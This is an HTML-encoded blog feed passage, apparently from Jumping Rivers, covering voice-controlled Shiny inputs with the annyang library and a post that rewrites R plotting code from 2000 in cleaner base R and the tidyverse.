&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tags&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;(tags&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;script&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;HTML&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; glue&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;glue&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;var &amp;lt;inputId&amp;gt; = &amp;#39;&amp;#39;;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; if(annyang){
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; var commands = {
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; &amp;#39;&amp;lt;keyword&amp;gt; *val&amp;#39;: function(val) {
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; &amp;lt;inputId&amp;gt; = val;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; Shiny.onInputChange(&amp;#39;&amp;lt;inputId&amp;gt;&amp;#39;, &amp;lt;inputId&amp;gt;);
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; annyang.addCommands(commands);
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; }&amp;#34;&lt;/span&gt;, .open &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;lt;&amp;#34;&lt;/span&gt;, .close &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We can now use this in the same way as other Shiny input functions.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ui &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;fluidPage&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;voiceInput&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;text&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;textOutput&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;out&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;server &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(input, output, session) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; output&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;out &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;renderText&lt;/span&gt;(input&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;text)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;shinyApp&lt;/span&gt;(ui, server)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;a href="https://jumpingrivers.shinyapps.io/speech3/" rel="external"&gt;Test it&lt;/a&gt; with &lt;strong&gt;Jarvis&lt;/strong&gt; followed by some other speech.&lt;/p&gt;
&lt;p&gt;Multiple voice inputs with different keywords are also fine. Personally, I think this particular design pattern is a bit of a pain, since it requires stating a keyword and then processing the text in R. But as a single R function that captures voice input and leaves us free to do what we like with the output, I think it’s OK. The plus side is that, outside of this function definition, we don’t need any JavaScript.&lt;/p&gt;
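&lt;p&gt;Once the speech arrives in R as a plain string, processing it is ordinary string handling. As a minimal sketch, assuming the first spoken word is treated as a command and the remaining words as its arguments, a helper might look like the following. The name &lt;code&gt;parse_speech()&lt;/code&gt; and the command/argument convention are hypothetical and not part of Shiny or annyang.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Hypothetical helper, not part of Shiny or annyang:
# split the captured speech into a command word and its arguments
parse_speech = function(text) {
  # lower-case, trim surrounding whitespace, then split on runs of whitespace
  words = strsplit(trimws(tolower(text)), &amp;#34;\\s+&amp;#34;)[[1]]
  list(command = words[1], args = words[-1])
}

parse_speech(&amp;#34;Plot mpg against weight&amp;#34;)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Inside the server function this could be called as &lt;code&gt;parse_speech(input$text)&lt;/code&gt;, for example within a reactive expression, so that each keyword-triggered phrase is turned into something the app can act on.&lt;/p&gt;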
&lt;h2 id="how-well-does-it-actually-work-in-practice"&gt;How well does it actually work in practice&lt;/h2&gt;
&lt;p&gt;I have found that performance is definitely not equal across devices and browsers. By far the best browser I have found for viewing the apps is Google Chrome. I have also tended to find that my Ubuntu machines don’t do as well as Windows machines at picking up words correctly. A chat I had with someone recently suggested this might be down to the microphone drivers under Ubuntu, but that is not my area of expertise. Voice recognition was also fine on both of my BlackBerry phones (one running BB OS 10, the other running Android 7).&lt;/p&gt;
&lt;p&gt;It is worth noting that this does require an internet connection to function: in Chrome the speech-to-text conversion is performed in the cloud.&lt;/p&gt;
&lt;p&gt;The other thing I have noticed is that annyang seems relatively sensitive to background noise. This isn’t so bad for functions called using specific phrases, but it does sometimes have a large effect on the multi-word splats. This is because the splats are greedy, and the background noise makes the recognition engine think that you are still talking long after you have finished, which gives the appearance of the application hanging.&lt;/p&gt;
&lt;h2 id="the-grand-plan"&gt;The grand plan&lt;/h2&gt;
&lt;p&gt;I have been playing around with annyang quite a lot and have started making an R package to make it more accessible to other R users. It’s currently on a private GitHub repo, but I will finish up soon and do a first public release there with an associated blog post. For now please feel free to borrow the above R function definition.&lt;/p&gt;
&lt;p&gt;I do think there is a lot of scope for the wider utility of voice-controlled applications. They do a phenomenal job of making certain aspects of the digital world more accessible to those who don’t consider themselves tech-savvy. I have been toying around with Alexa skills too, although primarily in Python, and am yet to discover whether there can be a pure R solution to getting Alexa to do things. But perhaps that’s for another post.&lt;/p&gt;
&lt;h4 id="image-credit"&gt;Image Credit:&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;The very neat image of the &lt;a href="https://www.flickr.com/photos/156466858@N02/31265224167/" rel="external"&gt;microphone&lt;/a&gt; is due to &lt;a href="https://musicoomph.com/best-blue-yeti-accessories/" rel="external"&gt;Gavin Whitner&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/voice-control-your-shiny-apps/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>R from the turn of the century</title><link>https://www.jumpingrivers.com/blog/r-from-the-turn-of-the-century/</link><pubDate>Thu, 20 Sep 2018 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r-from-the-turn-of-the-century/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r-from-the-turn-of-the-century/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-from-the-turn-of-the-century/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Last week I spent some time reminiscing about my PhD and looking through some old R code. This trip down memory lane led to some of my old R scripts that, amazingly, still run. My R scripts were fairly simple and just created a few graphs. However, now that I’ve been programming in R for a while (and R itself has changed), I can see with hindsight that my original code could be improved.&lt;/p&gt;
&lt;p&gt;I wrote this code around April 2000. To put this into perspective,&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The R mailing list was started in 1997&lt;/li&gt;
&lt;li&gt;R version 1.0 was released on Feb 29, 2000&lt;/li&gt;
&lt;li&gt;The initial release of Git was in 2005&lt;/li&gt;
&lt;li&gt;Twitter started in 2006&lt;/li&gt;
&lt;li&gt;Stack Overflow was launched in 2008&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Basically, sharing code and getting help was much trickier than it is today - so cut me some slack!&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2018-r-from-the-turn-of-the-century"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="the-original-code"&gt;The Original Code&lt;/h2&gt;
&lt;p&gt;My original code was fairly simple - a collection of &lt;code&gt;scan()&lt;/code&gt; commands with some &lt;code&gt;plot()&lt;/code&gt; and &lt;code&gt;lines()&lt;/code&gt; function calls.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Bad code, don&amp;#39;t copy!&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Seriously, don&amp;#39;t copy&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;par&lt;/span&gt;(cex&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;a&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;scan&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;data/time10.out&amp;#34;&lt;/span&gt;,&lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(x&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;c&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;seq&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;120&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;plot&lt;/span&gt;(c,a&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;x,type&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;l&amp;#39;&lt;/span&gt;,xlab&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;Counts&amp;#34;&lt;/span&gt;,ylim&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;0.08&lt;/span&gt;),ylab&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;Probability&amp;#34;&lt;/span&gt;,lwd&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2.5&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;a&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;scan&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;data/time15.out&amp;#34;&lt;/span&gt;,&lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(x&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;lines&lt;/span&gt;(c,a&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;x,col&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;,lwd&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2.5&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;a&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;scan&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;data/time20.out&amp;#34;&lt;/span&gt;,&lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(x&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;lines&lt;/span&gt;(c,a&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;x,col&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;,lwd&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2.5&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;a&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;scan&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;data/time25.out&amp;#34;&lt;/span&gt;,&lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(x&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;lines&lt;/span&gt;(c,a&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;x,col&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;,lwd&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2.5&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;a&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;scan&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;data/time30.out&amp;#34;&lt;/span&gt;,&lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(x&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;lines&lt;/span&gt;(c,a&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;x,col&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;,lwd&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2.5&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;abline&lt;/span&gt;(h&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;legend&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;90&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;0.08&lt;/span&gt;,lty&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;),lwd&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2.5&lt;/span&gt;,col&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;), &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;t=10&amp;#34;&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;&amp;#34;t=15&amp;#34;&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;&amp;#34;t=20&amp;#34;&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;&amp;#34;t=25&amp;#34;&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;&amp;#34;t=30&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The resulting graph ended up in my thesis, and a black and white version appeared in the resulting &lt;a href="http://www.mas.ncl.ac.uk/~ncsg3/content/papers/renshaw2008.pdf" rel="external"&gt;paper&lt;/a&gt;. Notice that it took over eight years to get published! This was down to a combination of focusing on my thesis, very long review times (over a year) and the fact that we sent the paper to journals via snail mail.&lt;/p&gt;
&lt;img class="image-center" src="setup-1.png" style="width:500px; class:image-center"&gt;
&lt;h2 id="how-i-should-have-written-the-code"&gt;How I should have written the code&lt;/h2&gt;
&lt;p&gt;Within the code, there are a number of obvious improvements that could be made.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;In 2000, it appears that I didn’t really see the need for formatting code. A few spaces around assignment arrows would be nice.&lt;/li&gt;
&lt;li&gt;I could have been cleverer with my &lt;code&gt;par()&lt;/code&gt; settings. See our recent &lt;a href="https://www.jumpingrivers.com/blog/styling-base-r-graphics/"&gt;blog post&lt;/a&gt; on styling base graphics.&lt;/li&gt;
&lt;li&gt;My file extensions for the data sets weren’t great. For some reason, I used &lt;code&gt;.out&lt;/code&gt; instead of &lt;code&gt;.csv&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;I used &lt;code&gt;scan()&lt;/code&gt; to read in the data. It would be much nicer using &lt;code&gt;read.csv()&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;My variable names could be more informative, for example, avoiding &lt;code&gt;c&lt;/code&gt; (which is also the name of a base R function) and &lt;code&gt;a&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Generating some of the vectors could be more succinct. For example&lt;/li&gt;
&lt;/ol&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;rep.int&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# instead of&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;and&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;120&lt;/span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# instead of&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;seq&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;120&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Overall, other than my use of &lt;code&gt;scan()&lt;/code&gt;, the actual code would be remarkably similar.&lt;/p&gt;
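&lt;p&gt;The points in the list above can be pulled together into a tidier base R version. The following is a minimal sketch rather than the script from the thesis: it assumes the five data files have been renamed with a &lt;code&gt;.csv&lt;/code&gt; extension and that each holds a single unnamed column of probabilities. The helper names &lt;code&gt;read_probs()&lt;/code&gt; and &lt;code&gt;plot_probs()&lt;/code&gt; are made up for illustration, and the repeated &lt;code&gt;plot()&lt;/code&gt;/&lt;code&gt;lines()&lt;/code&gt; calls are swapped for a single &lt;code&gt;matplot()&lt;/code&gt; call.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Assumption: the .out files have been renamed to .csv; each holds a single
# unnamed column of probabilities (one value per count, starting at zero)
times &amp;lt;- seq(10, 30, by = 5)
files &amp;lt;- file.path(&amp;#34;data&amp;#34;, paste0(&amp;#34;time&amp;#34;, times, &amp;#34;.csv&amp;#34;))

# Read every file and bind the columns into a matrix, one column per file
read_probs &amp;lt;- function(files) {
  sapply(files, function(f) read.csv(f, header = FALSE)[[1]])
}

# Draw one line per time point, then restore the previous par() settings
plot_probs &amp;lt;- function(probs, times, cols = c(1, 2, 3, 4, 6)) {
  op &amp;lt;- par(cex = 2)
  on.exit(par(op))
  counts &amp;lt;- seq_len(nrow(probs)) - 1 # 0, 1, 2, ...
  matplot(counts, probs, type = &amp;#34;l&amp;#34;, lty = 1, lwd = 2.5, col = cols,
          xlab = &amp;#34;Counts&amp;#34;, ylab = &amp;#34;Probability&amp;#34;, ylim = c(0, 0.08))
  abline(h = 0)
  legend(&amp;#34;topright&amp;#34;, legend = paste0(&amp;#34;t=&amp;#34;, times),
         lty = 1, lwd = 2.5, col = cols)
}
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;With the files in place, &lt;code&gt;plot_probs(read_probs(files), times)&lt;/code&gt; should draw a figure much like the original, with the file names and legend labels generated from &lt;code&gt;times&lt;/code&gt; instead of being typed out five times.&lt;/p&gt;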
&lt;h2 id="a-tidyverse-version"&gt;A tidyverse version&lt;/h2&gt;
&lt;p&gt;An interesting experiment is to see how the code structure differs when using the {tidyverse}. The first step is to load the necessary packages&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;fs&amp;#34;&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# Overkill here&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;purrr&amp;#34;&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# Fancy for loops&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;readr&amp;#34;&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# Reading in csv files&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;dplyr&amp;#34;&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# Manipulation of data frames&lt;/span&gt;
